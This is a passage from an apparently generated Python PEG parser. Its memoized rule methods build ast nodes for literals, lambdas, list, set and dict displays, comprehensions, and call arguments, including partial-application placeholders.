            return ast . Constant ( value = False , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) if sys . version_info >= ( 3 , 9 ) else ast . Constant ( value = False , kind = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('None'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Constant ( value = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) if sys . version_info >= ( 3 , 9 ) else ast . Constant ( value = None , kind = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            self.positive_lookahead(self.string, )
            and
            (strings := self.strings())
        ):
            return strings
        self._reset(mark)
        if (
            (a := self.number())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Constant ( value = ast . literal_eval ( a . string ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) if sys . version_info >= ( 3 , 9 ) else ast . Constant ( value = ast . literal_eval ( a . string ) , kind = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            self.positive_lookahead(self.expect, '(')
            and
            (_tmp_92 := self._tmp_92())
        ):
            return _tmp_92
        self._reset(mark)
        if (
            self.positive_lookahead(self.expect, '[')
            and
            (_tmp_93 := self._tmp_93())
        ):
            return _tmp_93
        self._reset(mark)
        if (
            self.positive_lookahead(self.expect, '{')
            and
            (_tmp_94 := self._tmp_94())
        ):
            return _tmp_94
        self._reset(mark)
        if (
            (literal := self.expect('...'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Constant ( value = Ellipsis , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) if sys . version_info >= ( 3 , 9 ) else ast . Constant ( value = Ellipsis , kind = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
    @memoize
    def group(self) -> Optional[Any]:
        """Parse a parenthesized group: ``'(' (yield_expr | named_expression) ')'``.

        The ``invalid_group`` alternative exists only to raise a better error
        message; its branch returns None. Otherwise returns the inner node.
        """
        # group: '(' (yield_expr | named_expression) ')' | invalid_group
        mark = self._mark()
        if (
            (literal := self.expect('('))
            and
            (a := self._tmp_95())
            and
            (literal_1 := self.expect(')'))
        ):
            return a
        self._reset(mark)
        if (
            (invalid_group := self.invalid_group())
        ):
            return None # pragma: no cover
        self._reset(mark)
        return None
    @memoize
    def lambdef(self) -> Optional[Any]:
        """Parse a lambda: ``'lambda' lambda_params? ':' expression``.

        When no parameter list is present, an empty ``make_arguments`` result
        is substituted. Returns ``ast.Lambda`` or None (after reset).
        """
        # lambdef: 'lambda' lambda_params? ':' expression
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (literal := self.expect('lambda'))
            and
            (a := self.lambda_params(),)
            and
            (literal_1 := self.expect(':'))
            and
            (b := self.expression())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Lambda ( args = a or self . make_arguments ( None , [] , None , [] , ( None , [] , None ) ) , body = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
    @memoize
    def lambda_params(self) -> Optional[Any]:
        """Parse lambda parameters, trying the invalid-parameters diagnostic rule first.

        Returns an ``ast.arguments`` from ``lambda_parameters`` or None.
        """
        # lambda_params: invalid_lambda_parameters | lambda_parameters
        mark = self._mark()
        if (
            (invalid_lambda_parameters := self.invalid_lambda_parameters())
        ):
            return None # pragma: no cover
        self._reset(mark)
        if (
            (lambda_parameters := self.lambda_parameters())
        ):
            return lambda_parameters
        self._reset(mark)
        return None
    @memoize
    def lambda_parameters(self) -> Optional[ast . arguments]:
        """Parse the full lambda parameter grammar (positional-only ``/``,
        defaults, ``*args``/keyword-only/``**kwargs`` sections).

        Each alternative feeds its pieces to ``make_arguments`` in the order
        (slash_no_default, slash_with_default, plain, with_default, star_etc).
        Returns ``ast.arguments`` or None (after resetting to ``mark``).
        """
        # lambda_parameters: lambda_slash_no_default lambda_param_no_default* lambda_param_with_default* lambda_star_etc? | lambda_slash_with_default lambda_param_with_default* lambda_star_etc? | lambda_param_no_default+ lambda_param_with_default* lambda_star_etc? | lambda_param_with_default+ lambda_star_etc? | lambda_star_etc
        mark = self._mark()
        if (
            (a := self.lambda_slash_no_default())
            and
            (b := self._loop0_96(),)
            and
            (c := self._loop0_97(),)
            and
            (d := self.lambda_star_etc(),)
        ):
            return self . make_arguments ( a , [] , b , c , d )
        self._reset(mark)
        if (
            (a := self.lambda_slash_with_default())
            and
            (b := self._loop0_98(),)
            and
            (c := self.lambda_star_etc(),)
        ):
            return self . make_arguments ( None , a , None , b , c )
        self._reset(mark)
        if (
            (a := self._loop1_99())
            and
            (b := self._loop0_100(),)
            and
            (c := self.lambda_star_etc(),)
        ):
            return self . make_arguments ( None , [] , a , b , c )
        self._reset(mark)
        if (
            (a := self._loop1_101())
            and
            (b := self.lambda_star_etc(),)
        ):
            return self . make_arguments ( None , [] , None , a , b )
        self._reset(mark)
        if (
            (a := self.lambda_star_etc())
        ):
            return self . make_arguments ( None , [] , None , [] , a )
        self._reset(mark)
        return None
    @memoize
    def lambda_slash_no_default(self) -> Optional[List [Tuple [ast . arg , None]]]:
        """Parse positional-only lambda params without defaults, ending at ``/``.

        The ``/`` must be followed by ``,`` or (via lookahead) the lambda's ``:``.
        Returns ``[(arg, None), ...]`` or None (after resetting to ``mark``).
        """
        # lambda_slash_no_default: lambda_param_no_default+ '/' ',' | lambda_param_no_default+ '/' &':'
        mark = self._mark()
        if (
            (a := self._loop1_102())
            and
            (literal := self.expect('/'))
            and
            (literal_1 := self.expect(','))
        ):
            return [( p , None ) for p in a]
        self._reset(mark)
        if (
            (a := self._loop1_103())
            and
            (literal := self.expect('/'))
            and
            self.positive_lookahead(self.expect, ':')
        ):
            return [( p , None ) for p in a]
        self._reset(mark)
        return None
    @memoize
    def lambda_slash_with_default(self) -> Optional[List [Tuple [ast . arg , Any]]]:
        """Parse positional-only lambda params where at least one has a default.

        Leading no-default params become ``(arg, None)`` pairs and are
        concatenated with the defaulted pairs. Returns the combined list or None.
        """
        # lambda_slash_with_default: lambda_param_no_default* lambda_param_with_default+ '/' ',' | lambda_param_no_default* lambda_param_with_default+ '/' &':'
        mark = self._mark()
        if (
            (a := self._loop0_104(),)
            and
            (b := self._loop1_105())
            and
            (literal := self.expect('/'))
            and
            (literal_1 := self.expect(','))
        ):
            return ( [( p , None ) for p in a] if a else [] ) + b
        self._reset(mark)
        if (
            (a := self._loop0_106(),)
            and
            (b := self._loop1_107())
            and
            (literal := self.expect('/'))
            and
            self.positive_lookahead(self.expect, ':')
        ):
            return ( [( p , None ) for p in a] if a else [] ) + b
        self._reset(mark)
        return None
    @memoize
    def lambda_star_etc(self) -> Optional[Tuple [Optional [ast . arg] , List [Tuple [ast . arg , Any]] , Optional [ast . arg]]]:
        """Parse the lambda ``*``/keyword-only/``**`` tail.

        Returns a ``(vararg, kwonly_pairs, kwarg)`` triple — ``('*' name ...)``,
        bare ``'*' ','`` (keyword-only marker), or just ``**kwargs`` — or None.
        """
        # lambda_star_etc: '*' lambda_param_no_default lambda_param_maybe_default* lambda_kwds? | '*' ',' lambda_param_maybe_default+ lambda_kwds? | lambda_kwds | invalid_lambda_star_etc
        mark = self._mark()
        if (
            (literal := self.expect('*'))
            and
            (a := self.lambda_param_no_default())
            and
            (b := self._loop0_108(),)
            and
            (c := self.lambda_kwds(),)
        ):
            return ( a , b , c )
        self._reset(mark)
        if (
            (literal := self.expect('*'))
            and
            (literal_1 := self.expect(','))
            and
            (b := self._loop1_109())
            and
            (c := self.lambda_kwds(),)
        ):
            return ( None , b , c )
        self._reset(mark)
        if (
            (a := self.lambda_kwds())
        ):
            return ( None , [] , a )
        self._reset(mark)
        if (
            (invalid_lambda_star_etc := self.invalid_lambda_star_etc())
        ):
            return None # pragma: no cover
        self._reset(mark)
        return None
    @memoize
    def lambda_kwds(self) -> Optional[ast . arg]:
        """Parse a lambda ``**kwargs`` parameter: ``'**' lambda_param_no_default``.

        Returns the ``ast.arg`` or None (after resetting to ``mark``).
        """
        # lambda_kwds: '**' lambda_param_no_default
        mark = self._mark()
        if (
            (literal := self.expect('**'))
            and
            (a := self.lambda_param_no_default())
        ):
            return a
        self._reset(mark)
        return None
    @memoize
    def lambda_param_no_default(self) -> Optional[ast . arg]:
        """Parse one lambda parameter without a default.

        The parameter must be followed by ``,`` (consumed) or, via lookahead
        only, the lambda's ``:``. Returns the ``ast.arg`` or None.
        """
        # lambda_param_no_default: lambda_param ',' | lambda_param &':'
        mark = self._mark()
        if (
            (a := self.lambda_param())
            and
            (literal := self.expect(','))
        ):
            return a
        self._reset(mark)
        if (
            (a := self.lambda_param())
            and
            self.positive_lookahead(self.expect, ':')
        ):
            return a
        self._reset(mark)
        return None
    @memoize
    def lambda_param_with_default(self) -> Optional[Tuple [ast . arg , Any]]:
        """Parse one lambda parameter with a required default value.

        Terminated by ``,`` (consumed) or a lookahead-only ``:``.
        Returns ``(arg, default)`` or None (after resetting to ``mark``).
        """
        # lambda_param_with_default: lambda_param default ',' | lambda_param default &':'
        mark = self._mark()
        if (
            (a := self.lambda_param())
            and
            (c := self.default())
            and
            (literal := self.expect(','))
        ):
            return ( a , c )
        self._reset(mark)
        if (
            (a := self.lambda_param())
            and
            (c := self.default())
            and
            self.positive_lookahead(self.expect, ':')
        ):
            return ( a , c )
        self._reset(mark)
        return None
    @memoize
    def lambda_param_maybe_default(self) -> Optional[Tuple [ast . arg , Any]]:
        """Parse one lambda parameter with an optional default value.

        ``(c := self.default(),)`` makes the default optional — ``c`` may be
        None. Returns ``(arg, default_or_None)`` or None.
        """
        # lambda_param_maybe_default: lambda_param default? ',' | lambda_param default? &':'
        mark = self._mark()
        if (
            (a := self.lambda_param())
            and
            (c := self.default(),)
            and
            (literal := self.expect(','))
        ):
            return ( a , c )
        self._reset(mark)
        if (
            (a := self.lambda_param())
            and
            (c := self.default(),)
            and
            self.positive_lookahead(self.expect, ':')
        ):
            return ( a , c )
        self._reset(mark)
        return None
    @memoize
    def lambda_param(self) -> Optional[ast . arg]:
        """Parse a bare lambda parameter name into an ``ast.arg``.

        Lambda parameters never carry annotations; ``type_comment=None`` is
        passed explicitly when targeting < 3.9. Returns the node or None.
        """
        # lambda_param: NAME
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (a := self.name())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . arg ( arg = a . string , annotation = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) if sys . version_info >= ( 3 , 9 ) else ast . arg ( arg = a . string , annotation = None , type_comment = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
    @memoize
    def strings(self) -> Optional[ast . Str]:
        """Parse one or more adjacent string literals and fuse them into one node.

        Concatenation/f-string handling is delegated to
        ``generate_ast_for_string``. Returns the node or None.
        """
        # strings: STRING+
        mark = self._mark()
        if (
            (a := self._loop1_110())
        ):
            return self . generate_ast_for_string ( a )
        self._reset(mark)
        return None
    @memoize
    def list(self) -> Optional[ast . List]:
        """Parse a list display: ``'[' star_named_expressions? ']'``.

        An empty ``[]`` yields ``elts=[]``. Returns ``ast.List`` or None.
        """
        # list: '[' star_named_expressions? ']'
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (literal := self.expect('['))
            and
            (a := self.star_named_expressions(),)
            and
            (literal_1 := self.expect(']'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . List ( elts = a or [] , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
    @memoize
    def tuple(self) -> Optional[ast . Tuple]:
        """Parse a tuple display: ``'(' [star_named_expression ',' ...] ')'``.

        The inner bracketed part (handled by ``_tmp_111``) is optional, so
        ``()`` yields an empty tuple. Returns ``ast.Tuple`` or None.
        """
        # tuple: '(' [star_named_expression ',' star_named_expressions?] ')'
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (literal := self.expect('('))
            and
            (a := self._tmp_111(),)
            and
            (literal_1 := self.expect(')'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Tuple ( elts = a or [] , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
    @memoize
    def set(self) -> Optional[ast . Set]:
        """Parse a set display: ``'{' star_named_expressions '}'``.

        At least one element is required (``{}`` is a dict). Returns
        ``ast.Set`` or None (after resetting to ``mark``).
        """
        # set: '{' star_named_expressions '}'
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (literal := self.expect('{'))
            and
            (a := self.star_named_expressions())
            and
            (literal_1 := self.expect('}'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Set ( elts = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
    @memoize
    def dict(self) -> Optional[ast . Dict]:
        """Parse a dict display: ``'{' double_starred_kvpairs? '}'``.

        Each kv pair is a ``(key, value)`` tuple (key is None for ``**``
        unpacking); they are split into parallel ``keys``/``values`` lists.
        The second alternative only triggers a better diagnostic. Returns
        ``ast.Dict`` or None.
        """
        # dict: '{' double_starred_kvpairs? '}' | '{' invalid_double_starred_kvpairs '}'
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (literal := self.expect('{'))
            and
            (a := self.double_starred_kvpairs(),)
            and
            (literal_1 := self.expect('}'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Dict ( keys = [kv [0] for kv in ( a or [] )] , values = [kv [1] for kv in ( a or [] )] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('{'))
            and
            (invalid_double_starred_kvpairs := self.invalid_double_starred_kvpairs())
            and
            (literal_1 := self.expect('}'))
        ):
            return None # pragma: no cover
        self._reset(mark)
        return None
    @memoize
    def double_starred_kvpairs(self) -> Optional[list]:
        """Parse a comma-separated list of dict entries with an optional trailing comma.

        Returns the list of ``(key, value)`` tuples or None.
        """
        # double_starred_kvpairs: ','.double_starred_kvpair+ ','?
        mark = self._mark()
        if (
            (a := self._gather_112())
            and
            (opt := self.expect(','),)
        ):
            return a
        self._reset(mark)
        return None
    @memoize
    def double_starred_kvpair(self) -> Optional[Any]:
        """Parse one dict entry: ``'**' bitwise_or`` (unpacking) or ``key: value``.

        ``**`` unpacking is encoded as ``(None, expr)`` to match ``ast.Dict``'s
        convention of a None key. Returns a tuple or None.
        """
        # double_starred_kvpair: '**' bitwise_or | kvpair
        mark = self._mark()
        if (
            (literal := self.expect('**'))
            and
            (a := self.bitwise_or())
        ):
            return ( None , a )
        self._reset(mark)
        if (
            (kvpair := self.kvpair())
        ):
            return kvpair
        self._reset(mark)
        return None
    @memoize
    def kvpair(self) -> Optional[tuple]:
        """Parse a ``key ':' value`` pair; returns ``(key_expr, value_expr)`` or None."""
        # kvpair: expression ':' expression
        mark = self._mark()
        if (
            (a := self.expression())
            and
            (literal := self.expect(':'))
            and
            (b := self.expression())
        ):
            return ( a , b )
        self._reset(mark)
        return None
    @memoize
    def for_if_clauses(self) -> Optional[List [ast . comprehension]]:
        """Parse one or more comprehension ``for``/``if`` clauses.

        Returns a list of ``ast.comprehension`` nodes or None.
        """
        # for_if_clauses: for_if_clause+
        mark = self._mark()
        if (
            (a := self._loop1_114())
        ):
            return a
        self._reset(mark)
        return None
    @memoize
    def for_if_clause(self) -> Optional[ast . comprehension]:
        """Parse a single comprehension clause, async or sync, with trailing ``if`` filters.

        The ``~`` (cut) in the grammar — implemented as ``(cut := True)`` — commits
        to an alternative once ``in`` is consumed: on a later failure the method
        returns None instead of trying other alternatives. Async comprehensions
        are gated to Python >= 3.6. Returns ``ast.comprehension`` or None.
        """
        # for_if_clause: 'async' 'for' star_targets 'in' ~ disjunction (('if' disjunction))* | 'for' star_targets 'in' ~ disjunction (('if' disjunction))* | invalid_for_target
        mark = self._mark()
        cut = False
        if (
            (literal := self.expect('async'))
            and
            (literal_1 := self.expect('for'))
            and
            (a := self.star_targets())
            and
            (literal_2 := self.expect('in'))
            and
            (cut := True)
            and
            (b := self.disjunction())
            and
            (c := self._loop0_115(),)
        ):
            return self . check_version ( ( 3 , 6 ) , "Async comprehensions are" , ast . comprehension ( target = a , iter = b , ifs = c , is_async = 1 ) )
        self._reset(mark)
        if cut: return None
        cut = False
        if (
            (literal := self.expect('for'))
            and
            (a := self.star_targets())
            and
            (literal_1 := self.expect('in'))
            and
            (cut := True)
            and
            (b := self.disjunction())
            and
            (c := self._loop0_116(),)
        ):
            return ast . comprehension ( target = a , iter = b , ifs = c , is_async = 0 )
        self._reset(mark)
        if cut: return None
        if (
            (invalid_for_target := self.invalid_for_target())
        ):
            return None # pragma: no cover
        self._reset(mark)
        return None
    @memoize
    def listcomp(self) -> Optional[ast . ListComp]:
        """Parse a list comprehension: ``'[' named_expression for_if_clauses ']'``.

        ``invalid_comprehension`` exists only to improve the error message.
        Returns ``ast.ListComp`` or None (after resetting to ``mark``).
        """
        # listcomp: '[' named_expression for_if_clauses ']' | invalid_comprehension
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (literal := self.expect('['))
            and
            (a := self.named_expression())
            and
            (b := self.for_if_clauses())
            and
            (literal_1 := self.expect(']'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . ListComp ( elt = a , generators = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (invalid_comprehension := self.invalid_comprehension())
        ):
            return None # pragma: no cover
        self._reset(mark)
        return None
    @memoize
    def setcomp(self) -> Optional[ast . SetComp]:
        """Parse a set comprehension: ``'{' named_expression for_if_clauses '}'``.

        ``invalid_comprehension`` exists only to improve the error message.
        Returns ``ast.SetComp`` or None (after resetting to ``mark``).
        """
        # setcomp: '{' named_expression for_if_clauses '}' | invalid_comprehension
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (literal := self.expect('{'))
            and
            (a := self.named_expression())
            and
            (b := self.for_if_clauses())
            and
            (literal_1 := self.expect('}'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . SetComp ( elt = a , generators = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (invalid_comprehension := self.invalid_comprehension())
        ):
            return None # pragma: no cover
        self._reset(mark)
        return None
    @memoize
    def genexp(self) -> Optional[ast . GeneratorExp]:
        """Parse a generator expression: ``'(' elt for_if_clauses ')'``.

        The element (``_tmp_117``) is an assignment expression or a plain
        expression not followed by ``:=``. Returns ``ast.GeneratorExp`` or None.
        """
        # genexp: '(' (assignment_expression | expression !':=') for_if_clauses ')' | invalid_comprehension
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (literal := self.expect('('))
            and
            (a := self._tmp_117())
            and
            (b := self.for_if_clauses())
            and
            (literal_1 := self.expect(')'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . GeneratorExp ( elt = a , generators = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (invalid_comprehension := self.invalid_comprehension())
        ):
            return None # pragma: no cover
        self._reset(mark)
        return None
    @memoize
    def dictcomp(self) -> Optional[ast . DictComp]:
        """Parse a dict comprehension: ``'{' kvpair for_if_clauses '}'``.

        ``kvpair`` yields a ``(key, value)`` tuple which is unpacked into the
        node's ``key``/``value`` fields. Returns ``ast.DictComp`` or None.
        """
        # dictcomp: '{' kvpair for_if_clauses '}' | invalid_dict_comprehension
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (literal := self.expect('{'))
            and
            (a := self.kvpair())
            and
            (b := self.for_if_clauses())
            and
            (literal_1 := self.expect('}'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . DictComp ( key = a [0] , value = a [1] , generators = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (invalid_dict_comprehension := self.invalid_dict_comprehension())
        ):
            return None # pragma: no cover
        self._reset(mark)
        return None
    @memoize
    def arguments(self) -> Optional[Tuple [list , list]]:
        """Parse a call argument list, requiring a ``)`` lookahead after it.

        Returns the ``(args, keywords)`` pair from ``args`` or None; the
        ``invalid_arguments`` alternative only improves diagnostics.
        """
        # arguments: args ','? &')' | invalid_arguments
        mark = self._mark()
        if (
            (a := self.args())
            and
            (opt := self.expect(','),)
            and
            self.positive_lookahead(self.expect, ')')
        ):
            return a
        self._reset(mark)
        if (
            (invalid_arguments := self.invalid_arguments())
        ):
            return None # pragma: no cover
        self._reset(mark)
        return None
    @memoize
    def args(self) -> Optional[Tuple [list , list]]:
        """Parse call arguments into a ``(positional, keyword)`` pair.

        ``ast.Starred`` nodes from the keyword section are routed back into
        the positional list (``*args`` after a keyword is still positional).
        Returns the pair or None (after resetting to ``mark``).
        """
        # args: ','.(starred_expression | (assignment_expression | expression !':=') !'=')+ [',' kwargs] | kwargs
        mark = self._mark()
        if (
            (a := self._gather_118())
            and
            (b := self._tmp_120(),)
        ):
            return ( a + ( [e for e in b if isinstance ( e , ast . Starred )] if b else [] ) , ( [e for e in b if not isinstance ( e , ast . Starred )] if b else [] ) )
        self._reset(mark)
        if (
            (a := self.kwargs())
        ):
            return ( [e for e in a if isinstance ( e , ast . Starred )] , [e for e in a if not isinstance ( e , ast . Starred )] )
        self._reset(mark)
        return None
    @memoize
    def kwargs(self) -> Optional[list]:
        """Parse the keyword section of a call: ``name=...``/``*expr`` items,
        optionally followed by ``name=...``/``**expr`` items.

        Returns a flat list of ``ast.keyword``/``ast.Starred`` nodes or None.
        """
        # kwargs: ','.kwarg_or_starred+ ',' ','.kwarg_or_double_starred+ | ','.kwarg_or_starred+ | ','.kwarg_or_double_starred+
        mark = self._mark()
        if (
            (a := self._gather_121())
            and
            (literal := self.expect(','))
            and
            (b := self._gather_123())
        ):
            return a + b
        self._reset(mark)
        if (
            (_gather_125 := self._gather_125())
        ):
            return _gather_125
        self._reset(mark)
        if (
            (_gather_127 := self._gather_127())
        ):
            return _gather_127
        self._reset(mark)
        return None
    @memoize
    def starred_expression(self) -> Optional[Any]:
        """Parse an iterable-unpacking argument: ``'*' expression``.

        Returns an ``ast.Starred`` (Load context) or None.
        """
        # starred_expression: '*' expression
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (literal := self.expect('*'))
            and
            (a := self.expression())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Starred ( value = a , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
    @memoize
    def kwarg_or_starred(self) -> Optional[Any]:
        """Parse ``NAME '=' expression`` or a ``*`` unpacking argument.

        ``invalid_kwarg`` runs first purely for diagnostics. Returns an
        ``ast.keyword``, an ``ast.Starred``, or None.
        """
        # kwarg_or_starred: invalid_kwarg | NAME '=' expression | starred_expression
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (invalid_kwarg := self.invalid_kwarg())
        ):
            return None # pragma: no cover
        self._reset(mark)
        if (
            (a := self.name())
            and
            (literal := self.expect('='))
            and
            (b := self.expression())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . keyword ( arg = a . string , value = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (a := self.starred_expression())
        ):
            return a
        self._reset(mark)
        return None
    @memoize
    def kwarg_or_double_starred(self) -> Optional[Any]:
        """Parse ``NAME '=' expression`` or a ``**`` mapping-unpacking argument.

        ``**expr`` becomes an ``ast.keyword`` with ``arg=None`` per the ast
        convention. Returns an ``ast.keyword`` or None.
        """
        # kwarg_or_double_starred: invalid_kwarg | NAME '=' expression | '**' expression
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (invalid_kwarg := self.invalid_kwarg())
        ):
            return None # pragma: no cover
        self._reset(mark)
        if (
            (a := self.name())
            and
            (literal := self.expect('='))
            and
            (b := self.expression())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . keyword ( arg = a . string , value = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('**'))
            and
            (a := self.expression())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . keyword ( arg = None , value = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
    @memoize
    def partial_arguments(self) -> Optional[Tuple [list , list]]:
        """Parse an argument list containing partial-application placeholders.

        Mirrors ``arguments`` but delegates to ``partial_args``; requires a
        ``)`` lookahead. Returns ``(args, keywords)`` or None.
        """
        # partial_arguments: partial_args ','? &')' | invalid_arguments
        mark = self._mark()
        if (
            (a := self.partial_args())
            and
            (opt := self.expect(','),)
            and
            self.positive_lookahead(self.expect, ')')
        ):
            return a
        self._reset(mark)
        if (
            (invalid_arguments := self.invalid_arguments())
        ):
            return None # pragma: no cover
        self._reset(mark)
        return None
    @memoize
    def partial_args(self) -> Optional[Tuple [list , list]]:
        """Parse partial-call arguments into a ``(positional, keyword)`` pair.

        Mirrors ``args`` but the item parsers also accept placeholders.
        ``ast.Starred`` nodes found in the keyword tail are moved to the
        positional list. Returns the pair or None.
        """
        # partial_args: ",".(partial_placeholder | partial_starred_expression | (assignment_expression | expression !':=') !'=')+ [',' partial_kwargs] | partial_kwargs
        mark = self._mark()
        if (
            (a := self._gather_129())
            and
            (b := self._tmp_131(),)
        ):
            return ( a + ( [e for e in b if isinstance ( e , ast . Starred )] if b else [] ) , ( [e for e in b if not isinstance ( e , ast . Starred )] if b else [] ) )
        self._reset(mark)
        if (
            (a := self.partial_kwargs())
        ):
            return ( [e for e in a if isinstance ( e , ast . Starred )] , [e for e in a if not isinstance ( e , ast . Starred )] )
        self._reset(mark)
        return None
    @memoize
    def partial_kwargs(self) -> Optional[list]:
        # partial_kwargs: ','.partial_kwarg_or_starred+ ',' ','.partial_kwarg_or_double_starred+ | ','.partial_kwarg_or_starred+ | ','.partial_kwarg_or_double_starred+
        """Parse the keyword segment of a partial call.

        Returns a flat list mixing ``ast.keyword`` and ``ast.Starred`` nodes
        (the caller separates them), or ``None`` if nothing matches.
        """
        mark = self._mark()
        if (
            (a := self._gather_132())
            and
            (literal := self.expect(','))
            and
            (b := self._gather_134())
        ):
            return a + b
        self._reset(mark)
        if (
            (_gather_136 := self._gather_136())
        ):
            return _gather_136
        self._reset(mark)
        if (
            (_gather_138 := self._gather_138())
        ):
            return _gather_138
        self._reset(mark)
        return None
    @memoize
    def partial_starred_expression(self) -> Optional[Any]:
        # partial_starred_expression: '*' (partial_placeholder | expression)
        """Parse ``*expr`` (or ``*?``) inside a partial call.

        Returns an ``ast.Starred`` in Load context with source locations
        spanning from the ``*`` token to the last consumed token, or ``None``.
        """
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (literal := self.expect('*'))
            and
            (a := self._tmp_140())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Starred ( value = a , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
    @memoize
    def partial_kwarg_or_starred(self) -> Optional[Any]:
        # partial_kwarg_or_starred: invalid_kwarg | NAME '=' (partial_placeholder | expression) | partial_starred_expression
        """Parse ``name=value`` or ``*value`` in a partial call.

        Returns an ``ast.keyword`` for ``name=value``, the ``ast.Starred``
        from ``partial_starred_expression``, or ``None``.  ``invalid_kwarg``
        is tried first purely to record a better syntax error.
        """
        mark = self._mark()
        tok = self._tokenizer.peek()
